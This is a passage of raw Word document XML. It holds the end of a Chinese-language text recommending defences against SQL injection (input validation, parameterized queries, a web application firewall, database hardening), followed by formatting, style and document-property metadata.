          <w:p w14:paraId="3EDF2D13" w14:textId="28FFC917" w:rsidR="005A51AC" w:rsidRPr="005A51AC" w:rsidRDefault="005A51AC" w:rsidP="005A51AC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（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）输入验证与过滤：对用户输入进行严格的验证和过滤，确保输入数据的合法性和安全性。可以采用白名单验证、正则表达式匹配等方式对用户输入进行限制和过滤。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77B0F5B8" w14:textId="0FB4DFF1" w:rsidR="005A51AC" w:rsidRPr="005A51AC" w:rsidRDefault="005A51AC" w:rsidP="005A51AC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（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2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）参数化查询：使用参数化查询代替拼接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SQL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语句的方式，避免用户输入直接参与到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SQL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语句的构建中。参数化查询可以有效防止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SQL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注入攻击，提高系统的安全性。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="684FC374" w14:textId="77D23518" w:rsidR="005A51AC" w:rsidRPr="005A51AC" w:rsidRDefault="005A51AC" w:rsidP="005A51AC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（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3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）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Web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应用程序防火墙：部署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Web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应用程序防火墙（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WAF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），对输入的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HTTP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请求进行实时监控和过滤，识别和拦截恶意请求，防止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SQL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注入攻击的发生。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="570A197F" w14:textId="77777777" w:rsidR="005A51AC" w:rsidRPr="005A51AC" w:rsidRDefault="005A51AC" w:rsidP="005A51AC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（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4</w:t>
            </w:r>
            <w:r w:rsidRPr="005A51A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）数据库安全配置：合理配置数据库的安全策略，如限制数据库用户的权限、启用数据库防火墙、定期备份数据库等，提高数据库的安全性。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E25900A" w14:textId="564BCD55" w:rsidR="005A51AC" w:rsidRPr="005A51AC" w:rsidRDefault="005A51AC" w:rsidP="005A51AC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</w:tbl>
    <w:p w14:paraId="54DA86DF" w14:textId="77777777" w:rsidR="00125B21" w:rsidRDefault="00125B21" w:rsidP="00D31D50">
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00125B21" w:rsidSect="00BE32D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20214" w14:textId="77777777" w:rsidR="0080465D" w:rsidRDefault="0080465D" w:rsidP="00455D87">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="763012C3" w14:textId="77777777" w:rsidR="0080465D" w:rsidRDefault="0080465D" w:rsidP="00455D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71CA1" w14:textId="77777777" w:rsidR="0080465D" w:rsidRDefault="0080465D" w:rsidP="00455D87">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="26EDB071" w14:textId="77777777" w:rsidR="0080465D" w:rsidRDefault="0080465D" w:rsidP="00455D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BD4E8D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="60F401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73668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2D28"/>
    <w:rsid w:val="00005BDB"/>
    <w:rsid w:val="00013EC9"/>
    <w:rsid w:val="0003786D"/>
    <w:rsid w:val="000464C0"/>
    <w:rsid w:val="00050EFA"/>
    <w:rsid w:val="000634C4"/>
    <w:rsid w:val="0007111F"/>
    <w:rsid w:val="0009375A"/>
    <w:rsid w:val="000A1CA7"/>
    <w:rsid w:val="000D018F"/>
    <w:rsid w:val="000D3AE9"/>
    <w:rsid w:val="000F2D55"/>
    <w:rsid w:val="000F3CBF"/>
    <w:rsid w:val="00107B64"/>
    <w:rsid w:val="0012184F"/>
    <w:rsid w:val="00125B21"/>
    <w:rsid w:val="0012609E"/>
    <w:rsid w:val="00176A93"/>
    <w:rsid w:val="00195BF9"/>
    <w:rsid w:val="001B0DA1"/>
    <w:rsid w:val="001D4C93"/>
    <w:rsid w:val="001F5C55"/>
    <w:rsid w:val="00226DF1"/>
    <w:rsid w:val="00227DCD"/>
    <w:rsid w:val="00250EC4"/>
    <w:rsid w:val="002742FB"/>
    <w:rsid w:val="0028261B"/>
    <w:rsid w:val="0029005F"/>
    <w:rsid w:val="002D37B1"/>
    <w:rsid w:val="002D613A"/>
    <w:rsid w:val="00317841"/>
    <w:rsid w:val="00323B43"/>
    <w:rsid w:val="003749BA"/>
    <w:rsid w:val="003A27B5"/>
    <w:rsid w:val="003D1456"/>
    <w:rsid w:val="003D37D8"/>
    <w:rsid w:val="003F32EE"/>
    <w:rsid w:val="003F4DEC"/>
    <w:rsid w:val="003F52DE"/>
    <w:rsid w:val="003F5324"/>
    <w:rsid w:val="00426133"/>
    <w:rsid w:val="00427A62"/>
    <w:rsid w:val="00427AC4"/>
    <w:rsid w:val="004358AB"/>
    <w:rsid w:val="00443E3E"/>
    <w:rsid w:val="00450086"/>
    <w:rsid w:val="00451AB8"/>
    <w:rsid w:val="00455D87"/>
    <w:rsid w:val="004942C0"/>
    <w:rsid w:val="004C0D5C"/>
    <w:rsid w:val="004C5405"/>
    <w:rsid w:val="004D0B4C"/>
    <w:rsid w:val="004D1117"/>
    <w:rsid w:val="004D482E"/>
    <w:rsid w:val="00504110"/>
    <w:rsid w:val="005208D0"/>
    <w:rsid w:val="00536163"/>
    <w:rsid w:val="00541E85"/>
    <w:rsid w:val="00564F3D"/>
    <w:rsid w:val="0057041B"/>
    <w:rsid w:val="00580CC7"/>
    <w:rsid w:val="00586D23"/>
    <w:rsid w:val="005A51AC"/>
    <w:rsid w:val="005B327E"/>
    <w:rsid w:val="005C166B"/>
    <w:rsid w:val="005E7ABE"/>
    <w:rsid w:val="00601178"/>
    <w:rsid w:val="00611380"/>
    <w:rsid w:val="00643188"/>
    <w:rsid w:val="00654CE7"/>
    <w:rsid w:val="00680E46"/>
    <w:rsid w:val="006A7551"/>
    <w:rsid w:val="006A75E3"/>
    <w:rsid w:val="006E3242"/>
    <w:rsid w:val="00702412"/>
    <w:rsid w:val="00767FE5"/>
    <w:rsid w:val="007970BC"/>
    <w:rsid w:val="007A5E56"/>
    <w:rsid w:val="007B0DFD"/>
    <w:rsid w:val="007E5664"/>
    <w:rsid w:val="007F0509"/>
    <w:rsid w:val="007F5F62"/>
    <w:rsid w:val="0080465D"/>
    <w:rsid w:val="00807833"/>
    <w:rsid w:val="00823FCD"/>
    <w:rsid w:val="00881448"/>
    <w:rsid w:val="00893318"/>
    <w:rsid w:val="008B0727"/>
    <w:rsid w:val="008B12AA"/>
    <w:rsid w:val="008B7726"/>
    <w:rsid w:val="008C02AC"/>
    <w:rsid w:val="008C0A8D"/>
    <w:rsid w:val="008C43A6"/>
    <w:rsid w:val="008E7F80"/>
    <w:rsid w:val="008F38C4"/>
    <w:rsid w:val="00906BDA"/>
    <w:rsid w:val="009324CF"/>
    <w:rsid w:val="00960C5D"/>
    <w:rsid w:val="00970130"/>
    <w:rsid w:val="00973DC7"/>
    <w:rsid w:val="00993B94"/>
    <w:rsid w:val="009B4786"/>
    <w:rsid w:val="009B5BDD"/>
    <w:rsid w:val="009C5687"/>
    <w:rsid w:val="009C6A15"/>
    <w:rsid w:val="00A05D61"/>
    <w:rsid w:val="00A2325E"/>
    <w:rsid w:val="00A368C2"/>
    <w:rsid w:val="00A37B76"/>
    <w:rsid w:val="00A44835"/>
    <w:rsid w:val="00A656C9"/>
    <w:rsid w:val="00A820FE"/>
    <w:rsid w:val="00A97121"/>
    <w:rsid w:val="00AB0961"/>
    <w:rsid w:val="00AB181D"/>
    <w:rsid w:val="00AC260D"/>
    <w:rsid w:val="00AD5E75"/>
    <w:rsid w:val="00B039A2"/>
    <w:rsid w:val="00B124AB"/>
    <w:rsid w:val="00B344E6"/>
    <w:rsid w:val="00B44D9F"/>
    <w:rsid w:val="00B46E42"/>
    <w:rsid w:val="00B51109"/>
    <w:rsid w:val="00B70FD0"/>
    <w:rsid w:val="00B83D33"/>
    <w:rsid w:val="00B92A1A"/>
    <w:rsid w:val="00BC1803"/>
    <w:rsid w:val="00BC23FC"/>
    <w:rsid w:val="00BC4791"/>
    <w:rsid w:val="00BD7407"/>
    <w:rsid w:val="00BE32D1"/>
    <w:rsid w:val="00BF3E40"/>
    <w:rsid w:val="00BF6BD4"/>
    <w:rsid w:val="00C05873"/>
    <w:rsid w:val="00C10293"/>
    <w:rsid w:val="00C275C1"/>
    <w:rsid w:val="00C47A2E"/>
    <w:rsid w:val="00C721B7"/>
    <w:rsid w:val="00C754D5"/>
    <w:rsid w:val="00C767E6"/>
    <w:rsid w:val="00C85E5B"/>
    <w:rsid w:val="00CE513B"/>
    <w:rsid w:val="00D03142"/>
    <w:rsid w:val="00D0426E"/>
    <w:rsid w:val="00D0594B"/>
    <w:rsid w:val="00D30582"/>
    <w:rsid w:val="00D31D50"/>
    <w:rsid w:val="00D358E8"/>
    <w:rsid w:val="00D40583"/>
    <w:rsid w:val="00D61110"/>
    <w:rsid w:val="00D77F4C"/>
    <w:rsid w:val="00D92BD0"/>
    <w:rsid w:val="00DA0CD5"/>
    <w:rsid w:val="00DA4B05"/>
    <w:rsid w:val="00DC37AF"/>
    <w:rsid w:val="00DE6963"/>
    <w:rsid w:val="00DF2E70"/>
    <w:rsid w:val="00E636F6"/>
    <w:rsid w:val="00E66E21"/>
    <w:rsid w:val="00E70AF7"/>
    <w:rsid w:val="00E73574"/>
    <w:rsid w:val="00E85AAE"/>
    <w:rsid w:val="00EA3678"/>
    <w:rsid w:val="00EC3668"/>
    <w:rsid w:val="00EC5868"/>
    <w:rsid w:val="00EC5E32"/>
    <w:rsid w:val="00EF1454"/>
    <w:rsid w:val="00EF628B"/>
    <w:rsid w:val="00F17314"/>
    <w:rsid w:val="00F27537"/>
    <w:rsid w:val="00F36285"/>
    <w:rsid w:val="00F40712"/>
    <w:rsid w:val="00F50891"/>
    <w:rsid w:val="00F62BC4"/>
    <w:rsid w:val="00F6708E"/>
    <w:rsid w:val="00F67960"/>
    <w:rsid w:val="00F9489A"/>
    <w:rsid w:val="00FA3F8B"/>
    <w:rsid w:val="00FC46D1"/>
    <w:rsid w:val="00FD0EAC"/>
    <w:rsid w:val="00FE407C"/>
    <w:rsid w:val="00FE6E09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F30B1"/>
  <w15:docId w15:val="{D85BA296-3F6D-48A6-A072-C751D524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D9F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D8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5D87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5D8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5D87"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="a7">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="0082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5E7ABE"/>
    <w:rPr>
      <w:color w:val="666666"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a9">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D77F4C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77F4C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EF145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5E894-3805-4BFC-BF4B-7BE941AC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11</Pages>
  <Words>782</Words>
  <Characters>4460</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>37</Lines>
  <Paragraphs>10</Paragraphs>
  <ScaleCrop>false</ScaleCrop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志维 张</cp:lastModifiedBy>
  <cp:revision>68</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2008-09-11T17:20:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-01T13:24:00Z</dcterms:modified>
</cp:coreProperties>
</file>